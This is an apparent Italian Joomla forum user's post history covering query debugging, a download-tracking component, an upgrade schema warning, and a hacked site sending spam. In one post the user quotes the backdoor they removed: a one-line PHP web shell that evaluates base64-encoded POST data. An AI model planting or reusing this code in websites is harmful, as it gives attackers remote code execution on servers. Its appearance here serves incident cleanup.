Post

1

Sicurezza / Re:Spam inviato dal sito!

« il: 27 Mag 2013, 18:03:30 »

Credo di aver risolto il problema.

Ho seguito alla lettera ciò che mi hai detto...effettuato un'analisi approfondita comparando il mio ultimo backup in locale e il sito quello online.
C'erano 3 file PHP di troppo (aggiunti il 19 maggio, data in cui di certo io non ci ho lavorato), la cui combinazione permetteva di eseguire codice sul server.

In uno di questi file PHP c'era anche un IP, probabilmente per "autorizzare l'accesso" all'hacker.
Ora sarebbe da capire come abbia fatto ad accedere al nostro spazio web per piazzarci quei file...

Dici che è necessario cambiare tutte le password? (Pannello di amministrazione del sito, FTP, database, amministrazione di Joomla...)

Tu cosa consigli?

Intanto...un mega grazie!!

2

Sicurezza / Re:Spam inviato dal sito!

« il: 27 Mag 2013, 14:16:15 »

Ciao!
Sono ancora in attesa che mi riattivino i servizi per agire sul problema.

Dalla tua risposta suppongo che la semplice eliminazione del file incriminato potrebbe non risolvere radicalmente la cosa...nel senso che, da qualche parte ci sarò una chiamata a quel file, giusto? Come faccio a scoprire chi o cosa lo invoca?
In più se non pongo rimedi più approfonditi potrebbe accadere di nuovo, giusto?

Visto che è la prima volta che mi capita una cosa del genere, potresti consigliarmi come fare per evitarlo? Non so, cambiare le password, agire in qualche modo sui permessi...

Come funziona filediff? Per farlo dovrei prima scaricare il sito in locale?

Scusa la raffica di domande  ma ne ho veramente bisogno!


[EDIT]
Ho appena eliminato il file ma prima l'ho scaricato per vedere cosa conteneva...
if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}

Qualche idea sul da farsi?!?!

3

Sicurezza / Re:Spam inviato dal sito!

« il: 24 Mag 2013, 15:10:45 »

Non lo so, non mi hanno ancora ripristinato l'accesso FTP 
Nel sito in locale, prima della pubblicazione, non c'era sicuramente...

4

Sicurezza / Spam inviato dal sito!

« il: 24 Mag 2013, 14:51:54 »

Ho questo urgente problema spero che possiate aiutarmi a risolverlo.

Il mio servizio di hosting mi ha (giustamente) sospeso il sito e l'accesso FTP a causa di un invio di spam da questo indirizzo:
[miosito]/components/com_weblinks/z3yksh.php

Nè online, nè qui sul forum ho trovato qualcosa al riguardo.

La versione di Joomla dovrebbe essere la più aggiornata (2.5.11).

Ho già aperto un ticket e mi hanno chiesto di risolverlo non appena mi riattiveranno l'accesso, altrimenti rischiano il ban dell'ip dell'intera macchina, il che non è cosa carina...
Potete immaginare che ho addosso una certa pressione.

Cosa posso fare? Potreste indirizzarmi in qualche modo?

5

Joomla! 1.6/1.7/2.5 / La versione dello schema del Database (2.5.9) non coincide con la versione del CMS (2.5.10)

« il: 26 Apr 2013, 18:55:26 »

Ciao a tutti!
Ho un sito con la versione 1.7.5 e volevo aggiornare all'ultima (cioè l'attuale 2.5.10).
Visto che è un processo abbastanza delicato, ho preso tutte le precauzioni del caso: backup dei file del sito e del database, e ho ricreato la situazione in locale sul mio server locale.
Quindi ho aggiornato, seguendo alla lettera questa guida nel wiki, utilizzando il metodo 3, cioè l'aggiornamento manuale. Tutto ok.
In più, attivato il modulo "Versione di Joomla" e piazzato nel footer dell'area amministrativa, questa è la versione che mi da (in formato esteso):
Joomla! 2.5.10 Stable [ Ember ] 24-April-2013 14:00 GMT


Sembra che tutto funzioni bene, ma nel tab "Database" in "Gestione estensioni" c'è questo messaggio che mi attanaglia:
La versione dello schema del Database (2.5.9) non coincide con la versione del CMS (2.5.10).


Sapreste aiutarmi a risolverlo?
Visto che tutto funziona, posso ripubblicare online il tutto secondo voi, nonostante quel messaggio?


Un saluto! buon weekend!

6

Gestione documenti e download / Re:Contatore hits un po' particolare

« il: 19 Mar 2012, 11:55:05 »

   volo!

7

Gestione documenti e download / Re:Contatore hits un po' particolare

« il: 19 Mar 2012, 11:43:45 »

In realtà non è stato un downgrade vero e proprio...era un sito che doveva avere fondamentalmente solo quella funzione, quindi ho provveduto ad una installazione dell'1.7 da zero e senza troppi dolori.
In più avevo una certa urgenza...


Comunque d'accordissimo con la tua osservazione jack 

8

Gestione documenti e download / Re:Contatore hits un po' particolare

« il: 16 Mar 2012, 11:18:39 »

Scusate il ritardo nell'aggiornamento.
Ho testato il componente, mi ha dato dei problemi sulla 2.5 quindi ho dovuto installare la 1.7, solo per lui 
Però è perfetto, fa proprio al caso mio!

Grazie 1000!

9

Gestione documenti e download / Re:Contatore hits un po' particolare

« il: 16 Feb 2012, 17:12:16 »

Grazie della dritta jeckdev! Purtroppo non c'è ancora una release di jDownloads per 2.5...dovrò installarmi un Joomla un po' più vecchiotto per verificare se c'è la feature che mi interessa. Sul loro sito ufficiale però, fra le main features, non ne parlano...
Comunque proverò appena posso e terrò aggiornata la community.

A presto!

p.s.
senti maaaaa....secondo te, volendo aggiungere questa feature, pensi sia troppo casino?

10

Gestione documenti e download / Contatore hits un po' particolare

« il: 16 Feb 2012, 11:54:29 »

Dal titolo può sembrare una cosa semplice...ma magari lo è 
Ho una pagina alla quale solo gli utenti registrati possono accedere. Questa pagina dovrà contenere una serie di link (esterni che puntano a pdf residenti su un altro server).
Ho bisogno di tracciare, e quindi di avere alla fine un log, i click che ogni utente ha fatto sui diversi link. In altre parole conoscere "chi ha scaricato cosa".
So che docMan e altri componenti lo fanno già, proprio come serve a me, ma la funzione si può utilizzare solo per tracciare i download dei file e non i link esterni.

Sapete consigliarmi un componente, un plugin, o semplicemente darmi un consiglio?

Grazie in anticipo!

11

Database / Re:due setquery collegate

« il: 24 Ott 2011, 23:27:16 »

100% ragione sull'apertura di un nuovo post.
Per il resto non era proprio così semplice le query da fare erano proprio diverse.

Grazie 1000 comunque e scusa il disturbo

12

Database / Re:due setquery collegate

« il: 24 Ott 2011, 13:50:41 »

Ho risolto...
C'era un'idiozia nella query "pressochè" identica, che poi alla fine non doveva esserlo

Scusate

...10 secondi di vergogna...

13

Database / Re:due setquery collegate

« il: 21 Ott 2011, 19:16:15 »

Ciao a tutti e scusate se proseguo un topic un po' vecchio, ma credo che sia esattamente quello di cui ho bisogno, anzi, in realtà è forse anche più complicato.
Il mio caso è il seguente:
1) eseguo una query nel DB;
2) se il risultato esiste, il valore restituito lo devo utilizzare all'interno di una seconda query;
3) il valore restituito dalla seconda query lo devo solo confrontare con un altro valore restituito da una terza query;
Il punto 1 e 2 riesco a farli funzionare, mentre il terzo no, apparentemente senza motivo. Per la precisione non riesco a tirare fuori dalla terza query il valore di cui ho bisogno, per confrontarlo con quello della seconda (fra l'altro le due query sono pressochè identiche).

Codice: [Seleziona]

$this->_db->setQuery("SELECT picid FROM blaa... ");
      if($this->_db->loadResult())
      {
$idFoto = $this->_db->loadResult();
$this->_db->setQuery("SELECT catid FROM blaaaa... ");
$categoriaVOTATA = $this->_db->loadResult();
$this->_db->setQuery("SELECT catid FROM bluuuu... ");
$categoriaATTUALE = $this->_db->loadResult();
if ($categoriaVOTATA == $categoriaATTUALE)
               {
VITTORIAAAAA
}
      }
Quindi, non riesco in nessun modo ad ottenere un valore dalla terza query e quindi nella variabile $categoriaATTUALE

Grazie a chiunque proverà ad aiutarmi.